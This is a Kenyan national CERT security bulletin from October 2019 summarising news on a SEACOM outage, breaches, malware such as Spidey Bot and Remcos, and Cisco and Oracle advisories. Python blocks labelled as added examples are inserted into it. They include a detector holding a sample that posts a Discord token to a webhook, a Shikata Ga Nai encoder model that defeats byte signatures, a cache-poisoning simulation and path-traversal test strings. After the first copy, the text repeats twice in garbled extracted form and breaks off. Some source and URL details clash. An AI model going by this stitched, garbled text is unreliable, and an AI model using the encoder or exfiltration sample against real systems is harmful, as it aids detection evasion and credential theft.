NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES

24th October 2019

Summary Headlines

Impact Metric Against Count of Events

Category                 Critical   High   Medium   Informative
Regional Highlights          0        1       0          1
Top Stories                  0        1       1          1
System vulnerabilities       1        2       0          0
Malware                      0        2       0          0
DDoS/Botnets                 0        1       0          0
Spam & Phishing              0        1       0          0
Web Security                 0        1       0          0
Updates & Alerts             0        1       1          0

Regional Highlights

Source 1: Citizen (https://citizentv.co.ke)
https://citizentv.co.ke/business/internet-users-in-kenya-affected-as-seacom-cites-outage-290733
Impact value: High
Internet users in Kenya affected as SEACOM cites outage
SEACOM has announced a major network outage affecting Kenya and South Africa. The company, which operates the broadband submarine cable system along the coast, said services between Mombasa and Zafarana have been affected. "All linear transmission traffic on the SEACOM Subsea Cable system on the East Coast of Africa to and from Europe are affected," a statement from the company reads. MyBroadband, a South African IT news website, reported that investigations are underway to determine the cause of the outage and the estimated time to repair. The outage is said to have occurred at 10pm on Tuesday. SEACOM said customers with IP or other managed network services terminating between Dar es Salaam and South Africa will remain unaffected but could experience a slight increase in latency as traffic is routed over its West Coast transmission links.

Source 2: Standard (https://standardmedia.co.ke)
https://www.standardmedia.co.ke/business/article/2001346324/stiff-penalties-for-those-who-abuse-private-data
Impact value: Informative
Stiff penalties for those who abuse private data
MPs have proposed stiff fines and lengthy prison sentences for individuals and companies that illegally obtain citizens' personal data. The penalties also target those who disclose or sell private data to third parties. The recommendations are contained in a report of the National Assembly Departmental Committee on Communication, Information and Innovation on the Data Protection Bill, 2019.

Top Stories

Source 1: Bleeping Computer (https://www.bleepingcomputer.com)
https://www.bleepingcomputer.com/news/security/hacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jail/
Impact value: High
Hacker Plants Keylogger Devices on Company Systems, Faces 12yr in Jail
A hacker admitted to planting hardware keyloggers on computers belonging to two companies to get unauthorized access to their networks and steal proprietary data. He also added his laptop and a hard drive to the company's computer network. He now faces 12 years of prison time. It appears that the individual was after data relating to an emerging technology that both targeted companies were developing.

https://www.bleepingcomputer.com/news/security/android-apps-identify-google-ips-to-delay-malicious-behavior/
Impact value: Medium
Android Apps Identify Google IPs to Delay Malicious Behaviour
Dozens of Android apps designed to flood phone screens with ads hide their malicious behaviour when a Google IP is detected. Collectively they were installed 8 million times. The developer of the 42 apps that made it into the official Android store added some tricks that made it more difficult to identify the source of the adware on devices.

Source 2: Threatpost (https://threatpost.com)
https://threatpost.com/survey-finds-people-are-privacy-hypocrites/149408/
Impact value: Informative
Survey Finds People are Privacy Hypocrites
The survey, commissioned by HP as part of National Cybersecurity Awareness Month, found that people are generally quite protective about their own private data in the workplace and online, even as we live more and more of our lives publicly. However, they also tend to encroach on others' privacy when given the opportunity, as a result of basic human nature, according to the report, called "HP Creepers and Peekers". The report by HP found that most people admit to looking at others' computer screens and documents in the workplace while still keeping their own privacy top of mind.

System vulnerabilities

Source 1: Threatpost (https://threatpost.com)
https://threatpost.com/critical-firefox-bugs-arbitrary-code-execution/149455/
Impact value: Critical
Firefox, Chrome Bugs Allow Arbitrary Code Execution
Critical vulnerabilities have been discovered in the Mozilla Firefox web browser and Firefox Extended Support Release (ESR), and a high-severity bug has been reported for Google Chrome, all of which could allow for arbitrary code execution. The bugs were announced as part of larger updates (to the Chrome 78 stable channel release, Firefox 70 and Firefox ESR 68.2) that also included several fixes for high-severity and moderate flaws.

https://threatpost.com/fujitsu-wireless-keyboard-unpatched-flaws/149477/
Impact value: High
Fujitsu Wireless Keyboard Plagued By Unpatched Flaws
Two high-severity flaws discovered in a popular Fujitsu wireless keyboard set could allow attackers a short distance away to "eavesdrop" on passwords entered on the keyboard or even fully take over a victim's system.

Source 2: The Next Web (https://thenextweb.com)
https://thenextweb.com/security/2019/10/23/major-chinese-browser-maxthon-has-a-bug-that-allows-anyone-admin-access/
Impact value: High
Major Chinese browser 'Maxthon' has a bug that allows anyone admin access
One of China's most popular browsers, Maxthon, has a bug in its Windows version that can allow a hacker to take admin control and install malware. A report by security firm SafeBreach notes it reported the vulnerability in September.

Malware

Source 1: Bleeping Computer (https://www.bleepingcomputer.com)
https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/
Impact value: High
Discord Turned Into an Info-Stealing Backdoor by New Malware
Discovered by researcher MalwareHunterTeam earlier this month, this malware is called Spidey Bot. When installed, it adds its own malicious JavaScript to the Discord client, then terminates and restarts the Discord app so that the new JavaScript is executed. Once started, the JavaScript executes various Discord API commands and JavaScript functions to collect a variety of information about the user, which is then sent via a Discord webhook to the attacker.
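A host-side check for the kind of tampering described above, written as an added example for this bulletin (it is not code from the article or from MalwareHunterTeam). It assumes that the Discord desktop client's `modules/discord_desktop_core/index.js` is normally a single `require()` of `core.asar`, and that JavaScript injected to report through a Discord webhook must carry the webhook URL and account/token lookups somewhere in the file. Both file bodies below are constructed samples, not real malware, and the expected loader line is an assumption to verify against a clean install before relying on it.

```python
"""Integrity check for the Discord desktop client's loader script.

Added example; not from the BleepingComputer article or MalwareHunterTeam.
Assumptions: discord_desktop_core/index.js is normally a one-line require()
of core.asar, and an injected info-stealer that reports via a Discord webhook
must embed the webhook URL in the JavaScript it adds.  The two file bodies at
the bottom are constructed samples.
"""
import os
import re
from typing import Dict, List

# Assumed clean content of discord_desktop_core/index.js (verify on a clean install).
EXPECTED_INDEX_JS = "module.exports = require('./core.asar');"

# Discord webhook endpoint, old and current domain.
WEBHOOK_RE = re.compile(
    r"https://(?:discordapp|discord)\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)

# Strings an injected stealer is likely to reference when it reads the
# logged-in account or its token through the client (assumption).
SUSPICIOUS_API_RE = re.compile(r"/api/v\d+/users/@me|localStorage|getToken|\.token\b")


def scan_index_js(text: str) -> List[str]:
    """Return findings for one index.js body; an empty list means it looks untouched."""
    findings: List[str] = []
    if text.strip() != EXPECTED_INDEX_JS:
        findings.append("index.js differs from the expected one-line loader")
    for match in WEBHOOK_RE.finditer(text):
        findings.append(f"Discord webhook URL embedded: {match.group(0)}")
    if SUSPICIOUS_API_RE.search(text):
        findings.append("references Discord account/token lookups")
    return findings


def scan_discord_install(root: str) -> Dict[str, List[str]]:
    """Walk an install tree (e.g. %APPDATA%\\Discord) and scan every
    discord_desktop_core/index.js found; keyed by path."""
    results: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == "discord_desktop_core" and "index.js" in files:
            path = os.path.join(dirpath, "index.js")
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[path] = scan_index_js(fh.read())
    return results


# Constructed samples: a clean loader and one with the sort of injection the
# article describes (webhook exfiltration of the stored token).
CLEAN_SAMPLE = "module.exports = require('./core.asar');\n"
TAMPERED_SAMPLE = CLEAN_SAMPLE + """
// constructed sample, not real malware
const hook = "https://discordapp.com/api/webhooks/123456789012345678/AbCdEf-ghIJ_kl";
const token = localStorage.getItem("token");
fetch(hook, {method: "POST", body: JSON.stringify({content: token})});
"""

if __name__ == "__main__":
    print("clean   :", scan_index_js(CLEAN_SAMPLE))
    print("tampered:", scan_index_js(TAMPERED_SAMPLE))
```

On a real machine, run `scan_discord_install` against the user's Discord data directory; any non-empty finding list is a reason to reinstall the client and rotate the account credentials, since a modified loader runs with the client's full access to the session.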

Source 2: FireEye (https://www.fireeye.com)
https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html
Impact value: High
Shikata Ga Nai Encoder Still Going Strong
Despite Metasploit's more than 15 years of existence, there are still core techniques that go undetected, allowing malicious actors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme. Modern detection systems have improved dramatically over the last several years and will often catch plain vanilla versions of known malicious methods. In many cases, though, if a threat actor knows what they are doing, they can slightly modify existing code to bypass detection.
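SGN is Metasploit's polymorphic XOR additive-feedback encoder. The following is an added model of that arithmetic for this bulletin, not Metasploit's encoder and not FireEye's code: it emits no x86 decoder stub and only reproduces what the stub's loop does to the payload bytes, so that the reason a static signature on the encoded bytes fails is visible. The 4-byte 0x90 padding and the sample payload are assumptions of the model.

```python
"""Model of the Shikata Ga Nai (SGN) additive-feedback XOR scheme.

Added illustration; not Metasploit's encoder and no decoder stub is produced.
Each 4-byte little-endian block is XORed with a 32-bit key, then the key is
advanced by adding the decoded (plaintext) block to it.  With a random
initial key the same payload encodes to different bytes on every run, so
detection has to target the decoder stub or the decoded payload at run time
rather than the encoded bytes.  The 0x90 padding byte is an assumption.
"""
import os
import struct

MASK32 = 0xFFFFFFFF


def _pad_to_block(data: bytes) -> bytes:
    """Pad to a multiple of 4 bytes (assumed 0x90 NOP padding for the model)."""
    return data + b"\x90" * (-len(data) % 4)


def sgn_encode(payload: bytes, key: int) -> bytes:
    """XOR each block with the running key, then feed the plaintext block back into the key."""
    payload = _pad_to_block(payload)
    out = bytearray()
    for off in range(0, len(payload), 4):
        block = struct.unpack_from("<I", payload, off)[0]
        out += struct.pack("<I", block ^ key)
        key = (key + block) & MASK32          # additive feedback on the plaintext block
    return bytes(out)


def sgn_decode(encoded: bytes, key: int) -> bytes:
    """Mirror of the decoder loop: xor [esi+off], eax ; add eax, [esi+off]."""
    out = bytearray()
    for off in range(0, len(encoded), 4):
        block = struct.unpack_from("<I", encoded, off)[0] ^ key   # decode in place
        out += struct.pack("<I", block)
        key = (key + block) & MASK32                              # memory now holds plaintext
    return bytes(out)


def encode_with_random_key(payload: bytes):
    """Return (key, encoded); a fresh random key makes every encoding differ."""
    key = struct.unpack("<I", os.urandom(4))[0]
    return key, sgn_encode(payload, key)


def roundtrip_ok(payload: bytes) -> bool:
    """Encode under a random key and check the decoder recovers the padded payload."""
    key, enc = encode_with_random_key(payload)
    return sgn_decode(enc, key) == _pad_to_block(payload)


if __name__ == "__main__":
    sample = b"\x01\x02\x03\x04\x05\x06\x07\x08"   # constructed stand-in for shellcode
    for _ in range(2):
        k, e = encode_with_random_key(sample)
        print(f"key=0x{k:08x} encoded={e.hex()}")   # differs each run
    print("roundtrip:", roundtrip_ok(sample))
```

Running the main block twice prints two different byte strings for the same input; a byte signature written against one of them will not match the other, which is the property the FireEye post is warning about. Detection of SGN in practice keys on the stub's characteristic instruction sequence (the FPU-based GetPC trick followed by the xor/add loop) or on the decoded payload after it runs.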

DDoSBotnets

Source 1: Bleeping Computer (https://www.bleepingcomputer.com)
https://www.bleepingcomputer.com/news/security/new-cpdos-web-cache-poisoning-attacks-impact-sites-using-popular-cdns/
Impact value: High
New CPDoS Web Cache Poisoning Attacks Impact Sites Using Popular CDNs
Details have emerged about a new class of web cache poisoning attacks that could be used to deny users access to resources delivered through a content delivery network (CDN). Named Cache-Poisoned Denial of Service (CPDoS), the new method has several variations and works by sending an HTTP request with a malformed header: the origin server rejects the request with an error response, the cache stores that error for the requested URL, and every subsequent visitor is served the cached error instead of the resource.
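An in-process model of the attack above, added as an example for this bulletin (it is not code from the article or from the CPDoS researchers). It simulates the HTTP Header Oversize (HHO) variant: the intermediate cache accepts a larger request header than the origin does, so it forwards the request; the origin answers 400; a cache that stores whatever the origin returned then serves that 400 to every later visitor of the same URL. The hardened cache never stores error responses and honours `Cache-Control: no-store`. The header limits, the `/index.html` resource and the header names are assumptions of the model.

```python
"""Minimal model of a Cache-Poisoned Denial of Service (CPDoS) attack.

Added example; not code from the BleepingComputer article or the CPDoS
research.  Models the HTTP Header Oversize variant with a toy origin, a
naive cache that stores error responses, and a hardened cache that does not.
Limits, URL and header names are assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, Tuple

ORIGIN_MAX_HEADER_BYTES = 8192    # assumed origin limit per header line
CACHE_MAX_HEADER_BYTES = 16384    # assumed cache limit; larger, so it forwards what the origin rejects


@dataclass
class Response:
    status: int
    body: str
    headers: Dict[str, str] = field(default_factory=dict)


def origin(path: str, headers: Dict[str, str]) -> Response:
    """Toy origin: rejects any request header line above its size limit."""
    for name, value in headers.items():
        if len(name) + len(value) + 2 > ORIGIN_MAX_HEADER_BYTES:
            # A careful origin marks the error uncacheable; a naive cache ignores it.
            return Response(400, "Bad Request: header too large", {"Cache-Control": "no-store"})
    return Response(200, f"contents of {path}", {"Cache-Control": "public, max-age=3600"})


class NaiveCache:
    """Keys on the URL only and stores whatever the origin answers (CPDoS-prone)."""

    def __init__(self) -> None:
        self.store: Dict[str, Response] = {}

    def should_store(self, resp: Response) -> bool:
        return True                                  # errors are cached too

    def get(self, path: str, headers: Dict[str, str]) -> Response:
        if path in self.store:
            return self.store[path]                  # cache hit, origin not consulted
        for name, value in headers.items():
            if len(name) + len(value) + 2 > CACHE_MAX_HEADER_BYTES:
                return Response(400, "cache rejected header")  # too big even for the cache: not stored
        resp = origin(path, headers)
        if self.should_store(resp):
            self.store[path] = resp
        return resp


class HardenedCache(NaiveCache):
    """Same lookup, but error responses and no-store responses never enter the cache."""

    def should_store(self, resp: Response) -> bool:
        cache_control = resp.headers.get("Cache-Control", "")
        return resp.status < 400 and "no-store" not in cache_control


def run_hho_attack(cache: NaiveCache) -> Tuple[int, int]:
    """One oversized-header request, then an innocent request for the same URL.
    Returns (status the attacker saw, status the next legitimate client saw)."""
    evil = {"X-Oversized": "A" * (ORIGIN_MAX_HEADER_BYTES + 1)}
    attacker = cache.get("/index.html", evil)
    victim = cache.get("/index.html", {"User-Agent": "legitimate-client"})
    return attacker.status, victim.status


if __name__ == "__main__":
    print("naive cache   :", run_hho_attack(NaiveCache()))     # victim also gets 400
    print("hardened cache:", run_hho_attack(HardenedCache()))  # victim gets 200
```

The same model covers the other CPDoS variants (meta characters, method override) by changing what the origin rejects; the defence is the same in each case: do not let an error triggered by one client's request become the cached representation that everyone else receives.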

Spam amp Phishing

Source 1: ZDNet (https://www.zdnet.com)
https://www.zdnet.com/article/prolific-ceo-business-email-scam-leads-to-arrests-in-spain/
Impact value: High
Phishing alert: This fake email about a bank payment delivers trojan malware
A highly customisable form of trojan malware has returned and is being distributed via phishing emails claiming that a payment is being made to a bank account. Researchers at Fortinet have uncovered a new Remcos campaign, with the new variant titled "2.5.0 Pro" according to hard-coded strings in the malicious code, which was compiled in September, indicating the freshness of this variant. Available to crooks for as little as $58, the malware is an information stealer and surveillance tool whose capabilities, including keylogging, taking screenshots and stealing clipboard contents, are used to secretly take usernames and passwords from infected victims.

Web Security

Source 1: Infosecurity (https://www.infosecurity-magazine.com)
https://www.infosecurity-magazine.com/news/cashback-websites-double-breach/
Impact value: High
Cash-back Websites Expose 2 TB of Sensitive Information
Money-saving websites used by over 3.5 million bargain hunters have leaked 2 terabytes of sensitive information onto the dark web. Data exposed by British website PouringPounds.com and Indian sister site CashKaro.com includes bank details, full names, mobile phone numbers, email addresses, plain-text passwords and usernames, IP addresses and more. Both sites are owned by PouringPounds Ltd. The double breach was discovered by a group of Safety Detectives researchers led by hacktivist and cybersecurity expert Anurag Sen. The researchers found the sensitive data in a publicly exposed Elasticsearch database without any password protection.

Bulletins

Source 1: US-CERT - Security Bulletin Mailing List (http://www.us-cert.gov/cas/bulletins)
https://www.us-cert.gov/ncas/bulletins/sb19-294
Vulnerability Summary for the Week of October 14, 2019, recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD).

Source 2: Oracle Security Bulletins (http://www.oracle.com/technetwork/topics/security/alerts-086861.html)
https://www.oracle.com/security-alerts/cpuoct2019.html
Oracle Critical Patch Update Advisory - October 2019. Advised action: apply the available security updates.

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
Oracle Security Alert Advisory - CVE-2019-2729: deserialization vulnerability in Oracle WebLogic Server, exploitable without authentication. Advised action: apply the security updates.

https://www.oracle.com/technetwork/topics/security/bulletinjul2019-5600410.html
Oracle Solaris Third Party Bulletin - July 2019. Advised action: apply the necessary patches.

https://www.oracle.com/technetwork/topics/security/linuxbulletinjul2019-5600392.html
Oracle Linux Bulletin - July 2019. Advised action: apply the necessary Oracle Linux Bulletin fixes.

https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html
Map of CVE to Advisory/Alert. Advised action: apply the Critical Patch Update for protection against known vulnerabilities.

https://www.oracle.com/technetwork/topics/security/ovmbulletinjul2019-5600406.html
Oracle VM Server for x86 Bulletin - July 2019. Advised action: apply the necessary Oracle VM Server for x86 Bulletin fixes.

Updates amp Alerts

Source 1: Cisco Security Advisories & Alerts (http://tools.cisco.com/security/center/publicationListing.x)
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyperflex-injection
Impact value: High
Cisco HyperFlex Software Command Injection Vulnerability
The vulnerability is due to improper handling of malformed HTTP methods. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected system. A successful exploit could allow the attacker to gain unauthorized access to the system. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191016-wlc-pathtrav
Impact value: Medium
Cisco Wireless LAN Controller Path Traversal Vulnerability
This vulnerability is due to improper sanitization of user-supplied input in command-line parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. A successful exploit could allow the attacker to view system files that may contain sensitive information.
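The defect class in the WLC advisory, a filename parameter concatenated onto a base directory without sanitisation, shown beside a check that confines the resolved path to that directory. This is an added example for this bulletin, not Cisco code, and says nothing about the internals of the WLC CLI; `BASE_DIR` and the sample filenames are assumptions.

```python
"""Filename parameter check against directory traversal.

Added example; not Cisco code.  unsafe_path() is the vulnerable pattern the
advisory describes (user input appended to a base directory and trusted);
safe_path() resolves the input lexically and refuses anything that lands
outside the base directory.  BASE_DIR and the sample names are assumptions.
"""
import posixpath

BASE_DIR = "/var/log/app"   # assumed directory the command is meant to read from


def unsafe_path(user_supplied: str) -> str:
    """Vulnerable pattern: concatenate and trust the result; '..' segments escape BASE_DIR."""
    return BASE_DIR + "/" + user_supplied


def resolved_unsafe_path(user_supplied: str) -> str:
    """What the filesystem actually opens for the unsafe pattern."""
    return posixpath.normpath(unsafe_path(user_supplied))


def safe_path(user_supplied: str, base_dir: str = BASE_DIR) -> str:
    """Resolve user input under base_dir; raise ValueError if it would escape.

    normpath collapses '.' and '..' lexically.  On a real filesystem also run
    os.path.realpath on the result so a symlink inside base_dir cannot point
    outside it.
    """
    if "\x00" in user_supplied:
        raise ValueError("NUL byte in filename")
    if posixpath.isabs(user_supplied):
        raise ValueError("absolute path not allowed")
    base_norm = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base_norm, user_supplied))
    # Compare with a trailing separator so /var/log/app2 is not accepted as inside /var/log/app.
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        raise ValueError(f"path escapes {base_norm}: {user_supplied!r}")
    return candidate


def is_allowed(user_supplied: str) -> bool:
    """Convenience wrapper: True if safe_path accepts the input."""
    try:
        safe_path(user_supplied)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ["reports/today.log", "../../../etc/passwd", "reports/../../secret", "/etc/shadow"]:
        print(f"{name!r:24} unsafe opens {resolved_unsafe_path(name):24} allowed={is_allowed(name)}")
```

The check is lexical on purpose so it behaves the same on any platform; on Windows-style inputs, normalise backslashes to `/` first, and wherever the filename arrives URL-encoded, decode it before the check, never after.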

www.ke-cirt.go.ke

Page 2: NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES 24th October … · Summary Headlines Impact Metric Against Count of Events Critical High Medium Informative Regional Highlights 0 1 0 1

Summary Headlines

Impact Metric Against Count of Events

Critical High Medium Informative

Regional Highlights 0 1 0 1

Top Stories 0 1 1 1

System vulnerabilities

1 2 0 0

Malware 0 2 0 0

DDoSBotnets 0 1 0 0

Spam amp phishing 0 1 0 0

Web Security 0 1 0 0

Updates amp alerts 0 1 1 0

Regional Highlights

Source 1 Citizen ( httpscitizentvcoke )httpscitizentvcokebusinessinternet-users-in-kenya-affected-as-seacom-cites-outage-290733Impact value High Internet users in Kenya affected as SEACOM cites outage SEACOM has announced a majornetwork outage affecting Kenya and South Africa The company that is behind the broadbandsubmarine cable system along the coast said services between Mombasa and Zafarana havebeen affected ldquoAll linear transmission traffic on the SEACOM Subsea Cable system on the EastCoast of Africa to and from Europe are affectedrdquo a statement from the company readsMyBroadband a South African IT news website reported that investigations are underway todetermine the cause of the outage and the estimated time to repair The outage is said to haveoccurred at 10pm on Tuesday SEACOM said customers with IP or other managed networkservices terminating between Dar es Salaam and South Africa will remain unaffected but couldexperience a slight increase in latency as traffic is routed over its West Coast transmission links

Source 2 Standard ( httpsstandardmediacoke )httpswwwstandardmediacokebusinessarticle2001346324stiff-penalties-for-those-who-abuse-private-dataImpact value InformativeStiff penalties for those who abuse private data MPs have proposed stiff fines and lengthyprison sentences for individuals and companies that illegally obtain citizensrsquo personal data Thepenalties also target those who disclose or sell private data to third partiesThe recommendations are contained in a report of the National Assembly DepartmentalCommittee on Communication Information and Innovation on the Data Protection Bill 2019

Top Stories

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecurityhacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jailImpact value HighHacker Plants Keylogger Devices on Company Systems Faces 12yr in Jail A hacker admitted toplanting hardware keyloggers on computers belonging to two companies to getunauthorized to their networks and steal proprietary data He also added his laptop and ahard drive to the companys computer network He now faces 12 years of prison time Itappears that the individual was after data relating to an emerging technology that bothtargeted companies were developinghttpswwwbleepingcomputercomnewssecurityandroid-apps-identify-google-ips-to-delay-malicious-behaviorImpact value MediumAndroid Apps Identify Google IPs to Delay Malicious Behaviour Dozens of Android appsdesigned to flood phone screens with ads hide their malicious behavior when a Google IP isdetected Collectively they were installed 8 million times The developer of the 42 apps thatmade it into the official Android store added some tricks that made it more difficult toidentify the source of the adware on devicesSource 2 Threatpost ( httpsthreatpostcom )httpsthreatpostcomsurvey-finds-people-are-privacy-hypocrites149408Impact value InformativeSurvey Finds People are Privacy Hypocrites The surveymdashcommissioned by HP as part ofNational Cybersecurity Awareness Monthmdashfound that people are generally quite protectiveabout their own private data in the workplace and online even as we live more and more ofour lives publicly However they also tend to encroach on othersrsquo privacy when given theopportunity as a result of basic human nature according to the report called ldquoHP Creepersand Peekersrdquo The report by HP found that most people admit to looking at othersrsquo computerscreens and documents in the workplace while still keeping their own privacy top of mind

System vulnerabilities

Source 1 Threatpost ( httpsthreatpostcom ) httpsthreatpostcomcritical-firefox-bugs-arbitrary-code-execution149455Impact value CriticalFirefox Chrome Bugs Allow Arbitrary Code-Execution Critical vulnerabilities have beendiscovered in the Mozilla Firefox web browser and Firefox Extended Support Release(ESR) and a high-severity bug has been reported for Google Chrome all of which couldallow for arbitrary code execution The bugs were announced as part of larger updates (toChrome 78 stable channel release Firefox 70 and Firefox ESR 682) that also includedseveral fixes for high-severity and moderate flaws

httpsthreatpostcomfujitsu-wireless-keyboard-unpatched-flaws149477Impact value High Fujitsu Wireless Keyboard Plagued By Unpatched Flaws Two high-severity flaws discovered in a popular Fujitsu wireless keyboard set could allow attackers from a short distance away to ldquoeavesdroprdquo on passwords entered into the keyboards or even fully takeover a victimrsquos system

Source 2 Thenextweb ( httpsthreatpostcom ) httpsthenextwebcomsecurity20191023major-chinese-browser-maxthon-has-a-bug-that-allows-anyone-admin-accessImpact value High Major Chinese browser lsquoMaxthonrsquo has a bug that allows anyone admin access One of Chinalsquos most popular browsers Maxthon has a bug in its Windows version that can allow a hacker to take admin control and install malware A report by security firm SafeBreachnotes it reported the vulnerability in September

Malware

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) Impact value Highhttpswwwbleepingcomputercomnewssecuritydiscord-turned-into-an-info-stealing-backdoor-by-new-malwareDiscord Turned Into an Info-Stealing Backdoor by New Malware Discovered by researcher MalwareHunterTeam earlier this month this malware is called Spidey Bot and when installed will add its own malicious JavaScript terminates and restart the Discord app in order for the new JavaScript changes to be executed Once started the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user that is then sent via a Discord webhook to the attacker

Source 2 Fireeye ( httpswwwfireeyecom ) httpswwwfireeyecomblogthreat-research201910shikata-ga-nai-encoder-still-going-stronghtmlImpact value HighShikata Ga Nai Encoder Still Going Strong Despite Metasploitrsquos over 15 yearexistence there are still core techniques that go undetected allowing maliciousactors to evade detection One of these core techniques is the Shikata Ga Nai(SGN) payload encoding scheme Modern detection systems have improveddramatically over the last several years and will often catch plain vanilla versionsof known malicious methods In many cases though if a threat actor knows whatthey are doing they can slightly modify existing code to bypass detection

DDoSBotnets

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecuritynew-cpdos-web-cache-poisoning-attacks-impact-sites-using-popular-cdnsImpact value High New CPDoS Web Cache Poisoning Attacks Impact Sites Using Popular CDNs Details have emerged about a new class of web cache poisoning attacks that could be used to deny users access to resources delivered through a content delivery network (CDN)Named Cache-Poisoned Denial of Service (CPDoS) the new method has several variations and works by sending an HTTP request with a malformed header

Spam amp Phishing

Source 1 Zdnet ( httpswwwzdnetcom ) httpswwwzdnetcomarticleprolific-ceo-business-email-scam-leads-to-arrests-in-spainImpact value HighPhishing alert This fake email about a bank payment delivers trojan malware A highly customisable form of trojan malware has returned and is being distributed via phishing emails claiming that a payment is being made to a bank account Now researchers at Fortinet have uncovered a new Remcos campaign ndash with the new variant titled 250 Pro according to hard-coded strings in the malicious code that was compiled in September ndash indicating the freshness of this variant Available to crooks for as little as $58 the malware is an information stealer and surveillance tool using capabilities including keylogging taking screenshots and stealing clipboard contents to secretly take usernames and passwords from infected victims

Web Security

Source 1 Infosecurity ( httpswwwinfosecurity-magazinecom )

httpswwwinfosecurity-magazinecomnewscashback-websites-double-breach

Impact value High

Cash-back Websites Expose 2 TB of Sensitive Information Money-saving websites

used by over 35 million bargain hunters have leaked 2 terabytes of sensitive

information onto the dark web Data exposed by British website PouringPoundscom

and Indian sister site CashKarocom includes bank details full names mobile phone

numbers email addresses plain-text passwords and usernames IP addresses and

more Both sites are owned by PouringPounds Ltd The double breach was discovered

by a group of Safety Detectives researchers led by hacktivist and cybersecurity expert

Anurag Sen Researchers found the sensitive data in a publicly exposed database

hosted on an elastic server without any password protection

Bulletins

Source 1 US-CERT - Security Bulletin Mailing List ( httpwwwus-certgovcasbulletins )

httpswwwus-certgovncasbulletinssb19-294Vulnerability Summary for the Week of October 14 2019 Recorded by National Institute of Standards and Technology and National Vulnerability

Source 2 Oracle Security Bulletins ( httpwwworaclecomtechnetworktopicssecurityalerts-086861html )

httpswwworaclecomsecurity-alertscpuoct2019htmlOracle Critical Patch Update Advisory - October 2019 advised action to run available security updates

httpswwworaclecomtechnetworksecurity-advisoryalert-cve-2019-2729-5570780htmlOracle Security Alert Advisory - CVE-2019-2729 Decentralization vulnerability in Oracle WebLogic Server exploitable without authentication requirements advised action to run security updates

httpswwworaclecomtechnetworktopicssecuritybulletinjul2019-5600410htmlOracle Solaris Third Party Bulletin - July 2019 advised action to apply necessary patches

httpswwworaclecomtechnetworktopicssecuritylinuxbulletinjul2019-5600392htmlOracle Linux Bulletin - July 2019 advised action to apply necessary Oracle Linux Bulletin fixes

httpswwworaclecomtechnetworktopicssecuritypublic-vuln-to-advisory-mapping-093627htmlMap of CVE to AdvisoryAlert advised action to apply the critical patch update for protection against known vulnerabilities

httpswwworaclecomtechnetworktopicssecurityovmbulletinjul2019-5600406htmlOracle VM Server for x86 Bulletin - July 2019 advised action to apply necessary Oracle VM Server for x86 Bulletin fixes

Updates amp Alerts

Source 1 Cisco Security Advisories amp

Alerts(httptoolsciscocomsecuritycenterpublicationListingx )

httpstoolsciscocomsecuritycentercontentCiscoSecurityAdvisorycisco-sa-20190220-

hyperflex-injection

Impact value High

Cisco HyperFlex Software Command Injection Vulnerability The vulnerability is due to improper

handling of malformed HTTP methods An attacker could exploit this vulnerability by sending a

crafted HTTP request to the affected system A successful exploit could allow the attacker to gain

unauthorized access to the system Cisco has released software updates that address this

vulnerability There are workarounds that address this vulnerability

httpstoolsciscocomsecuritycentercontentCiscoSecurityAdvisorycisco-sa-20191016-wlc-

pathtrav

Impact value medium

Cisco Wireless LAN Controller Path Traversal Vulnerability This vulnerability is due to improper

sanitization of user-supplied input in command-line parameters that describe filenames An

attacker could exploit this vulnerability by using directory traversal techniques to submit a path to

a desired file location A successful exploit could allow the attacker to view system files that may

contain sensitive information

wwwke-cirtgoke

Page 3: NATIONAL KE-CIRT/CC CYBERSECURITY UPDATES 24th October … · Summary Headlines Impact Metric Against Count of Events Critical High Medium Informative Regional Highlights 0 1 0 1

Regional Highlights

Source 1 Citizen ( httpscitizentvcoke )httpscitizentvcokebusinessinternet-users-in-kenya-affected-as-seacom-cites-outage-290733Impact value High Internet users in Kenya affected as SEACOM cites outage SEACOM has announced a majornetwork outage affecting Kenya and South Africa The company that is behind the broadbandsubmarine cable system along the coast said services between Mombasa and Zafarana havebeen affected ldquoAll linear transmission traffic on the SEACOM Subsea Cable system on the EastCoast of Africa to and from Europe are affectedrdquo a statement from the company readsMyBroadband a South African IT news website reported that investigations are underway todetermine the cause of the outage and the estimated time to repair The outage is said to haveoccurred at 10pm on Tuesday SEACOM said customers with IP or other managed networkservices terminating between Dar es Salaam and South Africa will remain unaffected but couldexperience a slight increase in latency as traffic is routed over its West Coast transmission links

Source 2 Standard ( httpsstandardmediacoke )httpswwwstandardmediacokebusinessarticle2001346324stiff-penalties-for-those-who-abuse-private-dataImpact value InformativeStiff penalties for those who abuse private data MPs have proposed stiff fines and lengthyprison sentences for individuals and companies that illegally obtain citizensrsquo personal data Thepenalties also target those who disclose or sell private data to third partiesThe recommendations are contained in a report of the National Assembly DepartmentalCommittee on Communication Information and Innovation on the Data Protection Bill 2019

Top Stories

